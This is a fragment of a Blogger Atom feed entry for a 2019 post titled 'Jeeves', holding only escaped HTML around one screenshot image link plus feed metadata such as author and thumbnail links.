&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAqH-IvnomBLpB_jcKXHCCjZdsEqVf8ZCEWGXAnr8Be6DWlCMbzB_tN8S7P73zHXHoMD0znH5RFhBclkLUs7Dv0RsbhUDr8ZC29ukWg8X5r2vE82NMq1gQnNp1IGKL-mKV_0AdTug9ASNg/s1600/screenshot.49.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAqH-IvnomBLpB_jcKXHCCjZdsEqVf8ZCEWGXAnr8Be6DWlCMbzB_tN8S7P73zHXHoMD0znH5RFhBclkLUs7Dv0RsbhUDr8ZC29ukWg8X5r2vE82NMq1gQnNp1IGKL-mKV_0AdTug9ASNg/s1600/screenshot.49.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/1255548117836607867'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/1255548117836607867'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2019/07/jeeves.html' title='Jeeves'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2tfn6jFUi1HVBu90HKpNEzxKcpQIy9Br82Z1whaTNbSOWnAlEE6qfNVB9hGjym4JGo5ZMcT4exYw2cAUbUNFC3drX4hnHONUqmfnsG7Bp4nc6U2HekT2s5hPlA9Si5J3rt_bW0d4ccurY/s72-c/screenshot.52.jpg" height="72" width="72"/></entry></feed>